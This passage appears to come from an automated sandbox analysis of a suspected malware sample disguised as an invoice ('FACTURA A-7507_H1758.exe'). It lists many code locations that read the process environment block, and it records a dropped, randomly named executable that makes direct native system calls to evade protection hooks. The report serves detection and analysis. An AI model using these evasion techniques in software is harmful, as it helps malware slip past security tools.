    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B330C mov eax, dword ptr fs:[00000030h]2_2_354B330C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35503336 mov eax, dword ptr fs:[00000030h]2_2_35503336
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545332D mov eax, dword ptr fs:[00000030h]2_2_3545332D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354633D0 mov eax, dword ptr fs:[00000030h]2_2_354633D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF38A mov eax, dword ptr fs:[00000030h]2_2_354EF38A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354393A6 mov eax, dword ptr fs:[00000030h]2_2_354393A6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354393A6 mov eax, dword ptr fs:[00000030h]2_2_354393A6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF247 mov eax, dword ptr fs:[00000030h]2_2_354EF247
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F24A mov eax, dword ptr fs:[00000030h]2_2_3545F24A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD250 mov eax, dword ptr fs:[00000030h]2_2_354AD250
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD250 mov ecx, dword ptr fs:[00000030h]2_2_354AD250
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C327E mov eax, dword ptr fs:[00000030h]2_2_354C327E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354ED270 mov eax, dword ptr fs:[00000030h]2_2_354ED270
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BB214 mov eax, dword ptr fs:[00000030h]2_2_354BB214
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BB214 mov eax, dword ptr fs:[00000030h]2_2_354BB214
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354532C5 mov eax, dword ptr fs:[00000030h]2_2_354532C5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_355032C9 mov eax, dword ptr fs:[00000030h]2_2_355032C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354272E0 mov eax, dword ptr fs:[00000030h]2_2_354272E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D2EC mov eax, dword ptr fs:[00000030h]2_2_3542D2EC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D2EC mov eax, dword ptr fs:[00000030h]2_2_3542D2EC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437290 mov eax, dword ptr fs:[00000030h]2_2_35437290
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437290 mov eax, dword ptr fs:[00000030h]2_2_35437290
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437290 mov eax, dword ptr fs:[00000030h]2_2_35437290
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF2AE mov eax, dword ptr fs:[00000030h]2_2_354EF2AE
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F92AB mov eax, dword ptr fs:[00000030h]2_2_354F92AB
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B2BC mov eax, dword ptr fs:[00000030h]2_2_3550B2BC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B2BC mov eax, dword ptr fs:[00000030h]2_2_3550B2BC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B2BC mov eax, dword ptr fs:[00000030h]2_2_3550B2BC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550B2BC mov eax, dword ptr fs:[00000030h]2_2_3550B2BC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354292AF mov eax, dword ptr fs:[00000030h]2_2_354292AF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429D46 mov eax, dword ptr fs:[00000030h]2_2_35429D46
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429D46 mov eax, dword ptr fs:[00000030h]2_2_35429D46
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429D46 mov ecx, dword ptr fs:[00000030h]2_2_35429D46
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DD4D mov eax, dword ptr fs:[00000030h]2_2_3544DD4D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DD4D mov eax, dword ptr fs:[00000030h]2_2_3544DD4D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DD4D mov eax, dword ptr fs:[00000030h]2_2_3544DD4D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F5D43 mov eax, dword ptr fs:[00000030h]2_2_354F5D43
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F5D43 mov eax, dword ptr fs:[00000030h]2_2_354F5D43
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431D50 mov eax, dword ptr fs:[00000030h]2_2_35431D50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431D50 mov eax, dword ptr fs:[00000030h]2_2_35431D50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1D5E mov eax, dword ptr fs:[00000030h]2_2_354B1D5E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35445D60 mov eax, dword ptr fs:[00000030h]2_2_35445D60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B5D60 mov eax, dword ptr fs:[00000030h]2_2_354B5D60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35505D65 mov eax, dword ptr fs:[00000030h]2_2_35505D65
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BD71 mov eax, dword ptr fs:[00000030h]2_2_3546BD71
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BD71 mov eax, dword ptr fs:[00000030h]2_2_3546BD71
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EBD08 mov eax, dword ptr fs:[00000030h]2_2_354EBD08
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EBD08 mov eax, dword ptr fs:[00000030h]2_2_354EBD08
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542FD20 mov eax, dword ptr fs:[00000030h]2_2_3542FD20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543BDE0 mov eax, dword ptr fs:[00000030h]2_2_3543BDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545FDE0 mov eax, dword ptr fs:[00000030h]2_2_3545FDE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF4 mov eax, dword ptr fs:[00000030h]2_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542DDB0 mov eax, dword ptr fs:[00000030h]2_2_3542DDB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437DB6 mov eax, dword ptr fs:[00000030h]2_2_35437DB6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542DC40 mov eax, dword ptr fs:[00000030h]2_2_3542DC40
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C40 mov eax, dword ptr fs:[00000030h]2_2_35443C40
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B3C57 mov eax, dword ptr fs:[00000030h]2_2_354B3C57
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov ecx, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C60 mov eax, dword ptr fs:[00000030h]2_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BC6E mov eax, dword ptr fs:[00000030h]2_2_3546BC6E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BC6E mov eax, dword ptr fs:[00000030h]2_2_3546BC6E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C20 mov eax, dword ptr fs:[00000030h]2_2_35443C20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C7C38 mov eax, dword ptr fs:[00000030h]2_2_354C7C38
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F5C38 mov eax, dword ptr fs:[00000030h]2_2_354F5C38
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F5C38 mov ecx, dword ptr fs:[00000030h]2_2_354F5C38
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35469CCF mov eax, dword ptr fs:[00000030h]2_2_35469CCF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543FCC9 mov eax, dword ptr fs:[00000030h]2_2_3543FCC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DCD1 mov eax, dword ptr fs:[00000030h]2_2_3544DCD1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DCD1 mov eax, dword ptr fs:[00000030h]2_2_3544DCD1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DCD1 mov eax, dword ptr fs:[00000030h]2_2_3544DCD1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3CD4 mov eax, dword ptr fs:[00000030h]2_2_354C3CD4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3CD4 mov eax, dword ptr fs:[00000030h]2_2_354C3CD4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3CD4 mov ecx, dword ptr fs:[00000030h]2_2_354C3CD4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3CD4 mov eax, dword ptr fs:[00000030h]2_2_354C3CD4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C3CD4 mov eax, dword ptr fs:[00000030h]2_2_354C3CD4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B5CD0 mov eax, dword ptr fs:[00000030h]2_2_354B5CD0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C7CE8 mov eax, dword ptr fs:[00000030h]2_2_354C7CE8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427CF1 mov eax, dword ptr fs:[00000030h]2_2_35427CF1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35433CF0 mov eax, dword ptr fs:[00000030h]2_2_35433CF0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35433CF0 mov eax, dword ptr fs:[00000030h]2_2_35433CF0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427C85 mov eax, dword ptr fs:[00000030h]2_2_35427C85
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427C85 mov eax, dword ptr fs:[00000030h]2_2_35427C85
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427C85 mov eax, dword ptr fs:[00000030h]2_2_35427C85
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427C85 mov eax, dword ptr fs:[00000030h]2_2_35427C85
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35427C85 mov eax, dword ptr fs:[00000030h]2_2_35427C85
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B3C80 mov ecx, dword ptr fs:[00000030h]2_2_354B3C80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9C98 mov ecx, dword ptr fs:[00000030h]2_2_354D9C98
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9C98 mov eax, dword ptr fs:[00000030h]2_2_354D9C98
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9C98 mov eax, dword ptr fs:[00000030h]2_2_354D9C98
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9C98 mov eax, dword ptr fs:[00000030h]2_2_354D9C98
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437C95 mov eax, dword ptr fs:[00000030h]2_2_35437C95
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437C95 mov eax, dword ptr fs:[00000030h]2_2_35437C95
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EFC95 mov eax, dword ptr fs:[00000030h]2_2_354EFC95
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EBF4D mov eax, dword ptr fs:[00000030h]2_2_354EBF4D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542BF70 mov eax, dword ptr fs:[00000030h]2_2_3542BF70
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431F70 mov eax, dword ptr fs:[00000030h]2_2_35431F70
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFF03 mov eax, dword ptr fs:[00000030h]2_2_354AFF03
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFF03 mov eax, dword ptr fs:[00000030h]2_2_354AFF03
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFF03 mov eax, dword ptr fs:[00000030h]2_2_354AFF03
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BF0C mov eax, dword ptr fs:[00000030h]2_2_3546BF0C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BF0C mov eax, dword ptr fs:[00000030h]2_2_3546BF0C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546BF0C mov eax, dword ptr fs:[00000030h]2_2_3546BF0C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DF36 mov eax, dword ptr fs:[00000030h]2_2_3544DF36
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DF36 mov eax, dword ptr fs:[00000030h]2_2_3544DF36
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DF36 mov eax, dword ptr fs:[00000030h]2_2_3544DF36
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544DF36 mov eax, dword ptr fs:[00000030h]2_2_3544DF36
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542FF30 mov edi, dword ptr fs:[00000030h]2_2_3542FF30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542BFC0 mov eax, dword ptr fs:[00000030h]2_2_3542BFC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B1FC9 mov eax, dword ptr fs:[00000030h]2_2_354B1FC9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429FD0 mov eax, dword ptr fs:[00000030h]2_2_35429FD0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFFDC mov eax, dword ptr fs:[00000030h]2_2_354AFFDC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFFDC mov eax, dword ptr fs:[00000030h]2_2_354AFFDC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFFDC mov eax, dword ptr fs:[00000030h]2_2_354AFFDC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFFDC mov ecx, dword ptr fs:[00000030h]2_2_354AFFDC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AFFDC mov eax, dword ptr fs:[00000030h]2_2_354AFFDC

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtAllocateVirtualMemory: Direct from: 0x776D2B0CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtOpenSection: Direct from: 0x776D2D2CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtQueryVolumeInformationFile: Direct from: 0x776D2E4CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtDeviceIoControlFile: Direct from: 0x776D2A0CJump to behavior
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeNtCreateFile: Direct from: 0x776D2F0CJump to behavior
